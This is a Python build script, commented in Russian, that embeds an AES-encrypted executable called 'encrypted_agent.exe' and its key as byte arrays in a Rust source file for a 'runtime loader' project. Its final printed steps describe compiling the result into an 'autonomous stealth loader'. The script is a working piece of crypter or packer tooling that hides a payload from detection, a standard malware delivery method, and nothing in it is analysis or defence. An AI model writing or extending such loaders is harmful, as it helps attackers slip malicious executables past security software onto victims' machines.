import os
import sys

def generate_rust_data():
    """
    Генерирует src/data.rs с встроенными зашифрованными данными для Rust loader
    """
    
    # Определяем абсолютные пути
    script_dir = os.path.dirname(os.path.abspath(__file__))
    project_root = os.path.dirname(script_dir)  # Поднимаемся на уровень выше от exe_guard
    
    # Пути к исходным файлам
    encrypted_file = os.path.join(project_root, "runtime_loader_rust", "output", "encrypted_agent.exe")
    key_file = os.path.join(project_root, "runtime_loader_rust", "output", "agent_aes.key")
    
    # Путь к целевому файлу
    data_rs_path = os.path.join(project_root, "runtime_loader_rust", "src", "data.rs")
    
    print(f"[DEBUG] Script directory: {script_dir}")
    print(f"[DEBUG] Project root: {project_root}")
    print(f"[DEBUG] Encrypted file path: {encrypted_file}")
    print(f"[DEBUG] Key file path: {key_file}")
    print(f"[DEBUG] Target data.rs path: {data_rs_path}")
    
    # Проверяем существование исходных файлов
    if not os.path.exists(encrypted_file):
        print(f"[❌] Зашифрованный файл не найден: {encrypted_file}")
        return False
    
    if not os.path.exists(key_file):
        print(f"[❌] AES ключ не найден: {key_file}")
        return False
    
    print(f"[✔] Читаем зашифрованный payload: {encrypted_file}")
    with open(encrypted_file, 'rb') as f:
        encrypted_data = f.read()
    
    print(f"[✔] Читаем AES ключ: {key_file}")
    with open(key_file, 'rb') as f:
        key_data = f.read()
    
    print(f"[✔] Размер зашифрованного payload: {len(encrypted_data)} байт")
    print(f"[✔] Размер AES ключа: {len(key_data)} байт")
    
    # Проверяем, что данные не пустые
    if len(encrypted_data) == 0:
        print(f"[❌] Зашифрованный файл пустой!")
        return False
    
    if len(key_data) == 0:
        print(f"[❌] Файл ключа пустой!")
        return False
    
    # Создаем директорию src если не существует
    src_dir = os.path.dirname(data_rs_path)
    os.makedirs(src_dir, exist_ok=True)
    
    print(f"[DEBUG] Создаем файл: {data_rs_path}")
    
    try:
        # Записываем файл с явным flush
        with open(data_rs_path, 'w', encoding='utf-8') as f:
            # Заголовок файла
            f.write("// Auto-generated embedded payload for Rust loader\n")
            f.write("// Generated by rust_loader_generator.py\n")
            f.write(f"// Original payload size: {len(encrypted_data)} bytes\n")
            f.write(f"// AES key size: {len(key_data)} bytes\n\n")
            
            # Генерируем массив с зашифрованными данными
            f.write(f"pub static ENCRYPTED_AGENT: [u8; {len(encrypted_data)}] = [\n")
            
            # Записываем данные по 16 байт в строке для читабельности
            for i in range(0, len(encrypted_data), 16):
                chunk = encrypted_data[i:i+16]
                line = "    " + ", ".join(f"0x{b:02x}" for b in chunk) + ",\n"
                f.write(line)
            
            f.write("];\n\n")
            
            # Генерируем массив с AES ключом
            f.write(f"pub static AES_KEY: [u8; {len(key_data)}] = [\n")
            f.write("    " + ", ".join(f"0x{b:02x}" for b in key_data) + "\n")
            f.write("];\n")
            
            # Принудительный flush буферов
            f.flush()
            os.fsync(f.fileno())
        
        # Проверяем что файл действительно создан и не пустой
        if os.path.exists(data_rs_path):
            file_size = os.path.getsize(data_rs_path)
            print(f"[✔] Файл создан успешно, размер: {file_size} байт")
            
            if file_size == 0:
                print(f"[❌] Файл создан, но пустой!")
                return False
            
            # Читаем первые несколько строк для проверки
            with open(data_rs_path, 'r', encoding='utf-8') as f:
                first_lines = f.readlines()[:5]
                print(f"[DEBUG] Первые строки файла:")
                for line in first_lines:
                    print(f"[DEBUG] {line.strip()}")
            
            print(f"[+] ✅ Успешно сгенерирован {data_rs_path}")
            return True
        else:
            print(f"[❌] Файл не был создан!")
            return False
            
    except Exception as e:
        print(f"[❌] Ошибка при записи файла: {e}")
        return False

def main():
    print("[🔧] Генерация Rust loader с embedded payload...")
    
    if generate_rust_data():
        print("\n[🎯] Следующие шаги:")
        print("1. cd runtime_loader_rust")
        print("2. Обновите src/main.rs для использования data::{ENCRYPTED_AGENT, AES_KEY}")
        print("3. cargo build --release")
        print("4. Получите автономный stealth loader!")
    else:
        print("\n[❌] Генерация завершилась с ошибками!")
        sys.exit(1)

if __name__ == "__main__":
    main()
